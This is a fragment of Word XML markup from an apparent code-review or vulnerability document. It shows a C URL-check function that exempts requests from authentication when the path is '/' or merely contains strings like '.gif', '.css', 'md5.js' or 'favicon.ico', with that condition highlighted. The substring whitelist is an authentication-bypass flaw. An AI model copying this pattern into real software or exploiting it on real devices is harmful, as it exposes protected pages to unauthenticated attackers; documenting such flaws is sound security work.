            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)</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HW_CHAR8 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>acCompareUrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>[WEB_URL_LENGTH] = {0};</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HW_CHAR8 *</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pcEndChar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = HW_NULL_PTR;</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HW_CHAR8 *</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pcStartChar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>g_stCustomWebConfig.acNoAuthPage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>;</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HW_UINT32 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>uiLen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = HW_NULL;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00D67D03" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pP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hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    /* 参数校验 */</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if (HW_NULL_PTR == </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pcUrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)</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HW_WAP_LAST_WORD(HW_WEB_ERR_PARA_NULL, 0, 0, 0, 0);</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return HW_FALSE;</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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00D67D03" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pP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hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    /* 只输入</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>不需要鉴权 */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00D67D03" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (HW_NULL == </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HW_OS_StrCmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pcUrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, "/")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00D67D03" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">       || HW_NULL_PTR != </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HW_OS_StrStr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pcUrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, ".gif")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00D67D03" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">       || HW_NULL_PTR != </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HW_OS_StrStr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pcUrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, ".jpg")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00D67D03" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">       || HW_NULL_PTR != </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HW_OS_StrStr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pcUrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, ".</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>css</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00D67D03" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">       || HW_NULL_PTR != </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HW_OS_StrStr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pcUrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, "md5.js")   </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00D67D03" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">       || HW_NULL_PTR != </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HW_OS_StrStr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pcUrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, "sha256.js")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00D67D03" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">       || HW_NULL_PTR != </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HW_OS_StrStr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pcUrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="0066FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, "favicon.ico")) </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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00D67D03" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        return HW_TRUE;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00D67D03" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRPr="00D67D03" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>…………………………………</w:t>
            </w:r>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>..</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00021104" w:rsidRDefault="00021104" w:rsidP="00303753">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D67D03">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007E62CF" w:rsidRDefault="007E62CF" w:rsidP="00303753">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007E62CF" w:rsidRPr="00E14DFA" w:rsidRDefault="007E62CF" w:rsidP="00303753">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E14DFA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
